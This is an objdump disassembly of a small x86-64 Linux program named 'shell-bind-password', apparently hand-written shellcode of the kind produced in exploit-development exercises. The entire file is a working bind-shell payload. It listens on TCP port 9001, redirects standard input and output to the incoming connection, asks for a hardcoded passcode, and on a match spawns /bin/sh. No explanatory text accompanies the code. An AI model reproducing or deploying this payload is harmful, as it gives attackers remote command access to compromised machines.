
shell-bind-password:     file format elf64-x86-64


Disassembly of section .text:

0000000000401000 <_start>:
  401000:	eb 15                	jmp    401017 <main>

0000000000401002 <ask_pass>:
  401002:	54                   	push   rsp
  401003:	65 6c                	gs ins BYTE PTR es:[rdi],dx
  401005:	6c                   	ins    BYTE PTR es:[rdi],dx
  401006:	20 6d 65             	and    BYTE PTR [rbp+0x65],ch
  401009:	20 74 68 65          	and    BYTE PTR [rax+rbp*2+0x65],dh
  40100d:	20 70 61             	and    BYTE PTR [rax+0x61],dh
  401010:	73 73                	jae    401085 <password+0x9>
  401012:	63 6f 64             	movsxd ebp,DWORD PTR [rdi+0x64]
  401015:	65                   	gs
  401016:	0a                   	.byte 0xa

0000000000401017 <main>:
  401017:	48 31 f6             	xor    rsi,rsi
  40101a:	48 f7 e6             	mul    rsi
  40101d:	48 83 c0 29          	add    rax,0x29
  401021:	6a 02                	push   0x2
  401023:	5f                   	pop    rdi
  401024:	48 ff c6             	inc    rsi
  401027:	0f 05                	syscall 
  401029:	48 97                	xchg   rdi,rax
  40102b:	48 31 c0             	xor    rax,rax
  40102e:	50                   	push   rax
  40102f:	66 68 23 29          	pushw  0x2923
  401033:	66 6a 02             	pushw  0x2
  401036:	48 89 e6             	mov    rsi,rsp
  401039:	48 83 c2 10          	add    rdx,0x10
  40103d:	48 83 c0 31          	add    rax,0x31
  401041:	0f 05                	syscall 
  401043:	48 31 c0             	xor    rax,rax
  401046:	48 89 c2             	mov    rdx,rax
  401049:	48 83 c2 01          	add    rdx,0x1
  40104d:	48 83 c0 32          	add    rax,0x32
  401051:	0f 05                	syscall 
  401053:	48 31 c0             	xor    rax,rax
  401056:	48 89 c6             	mov    rsi,rax
  401059:	48 89 c2             	mov    rdx,rax
  40105c:	48 83 c0 2b          	add    rax,0x2b
  401060:	0f 05                	syscall 
  401062:	48 97                	xchg   rdi,rax
  401064:	4d 31 c9             	xor    r9,r9

0000000000401067 <loopin>:
  401067:	48 31 c0             	xor    rax,rax
  40106a:	48 83 c0 21          	add    rax,0x21
  40106e:	4c 89 ce             	mov    rsi,r9
  401071:	0f 05                	syscall 
  401073:	49 ff c1             	inc    r9
  401076:	49 83 f9 03          	cmp    r9,0x3
  40107a:	75 eb                	jne    401067 <loopin>

000000000040107c <password>:
  40107c:	48 31 c0             	xor    rax,rax
  40107f:	48 31 d2             	xor    rdx,rdx
  401082:	48 ff c0             	inc    rax
  401085:	48 89 c7             	mov    rdi,rax
  401088:	48 8d 35 73 ff ff ff 	lea    rsi,[rip+0xffffffffffffff73]        # 401002 <ask_pass>
  40108f:	b2 15                	mov    dl,0x15
  401091:	0f 05                	syscall 
  401093:	48 31 d2             	xor    rdx,rdx
  401096:	48 31 c0             	xor    rax,rax
  401099:	48 31 ff             	xor    rdi,rdi
  40109c:	48 89 e6             	mov    rsi,rsp
  40109f:	48 83 c2 20          	add    rdx,0x20
  4010a3:	0f 05                	syscall 
  4010a5:	48 89 e7             	mov    rdi,rsp
  4010a8:	48 31 f6             	xor    rsi,rsi
  4010ab:	56                   	push   rsi
  4010ac:	48 be 6f 6e 6f 67 6f 	movabs rsi,0xa646f6f676f6e6f
  4010b3:	6f 64 0a 
  4010b6:	56                   	push   rsi
  4010b7:	48 be 61 74 69 61 6d 	movabs rsi,0x7470756d61697461
  4010be:	75 70 74 
  4010c1:	56                   	push   rsi
  4010c2:	48 be 79 73 77 65 61 	movabs rsi,0x6874726165777379
  4010c9:	72 74 68 
  4010cc:	56                   	push   rsi
  4010cd:	48 be 69 73 6f 6c 65 	movabs rsi,0x6c6e6d656c6f7369
  4010d4:	6d 6e 6c 
  4010d7:	56                   	push   rsi
  4010d8:	48 89 e6             	mov    rsi,rsp
  4010db:	48 31 c9             	xor    rcx,rcx
  4010de:	80 c1 20             	add    cl,0x20
  4010e1:	f3 a6                	repz cmps BYTE PTR ds:[rsi],BYTE PTR es:[rdi]
  4010e3:	75 97                	jne    40107c <password>
  4010e5:	48 31 c0             	xor    rax,rax
  4010e8:	50                   	push   rax
  4010e9:	48 bb 2f 62 69 6e 2f 	movabs rbx,0x68732f2f6e69622f
  4010f0:	2f 73 68 
  4010f3:	53                   	push   rbx
  4010f4:	48 89 e7             	mov    rdi,rsp
  4010f7:	50                   	push   rax
  4010f8:	48 89 e2             	mov    rdx,rsp
  4010fb:	57                   	push   rdi
  4010fc:	48 89 e6             	mov    rsi,rsp
  4010ff:	48 83 c0 3b          	add    rax,0x3b
  401103:	0f 05                	syscall 
